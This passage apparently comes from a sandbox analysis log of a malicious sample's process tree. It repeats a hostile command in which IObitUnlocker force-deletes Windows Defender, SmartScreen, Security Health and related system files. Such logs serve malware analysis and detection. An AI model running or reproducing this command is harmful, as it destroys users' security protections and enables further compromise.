                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:12156
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:10640
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:11476
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:11732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:12020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:12240
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:11136
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:11640
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 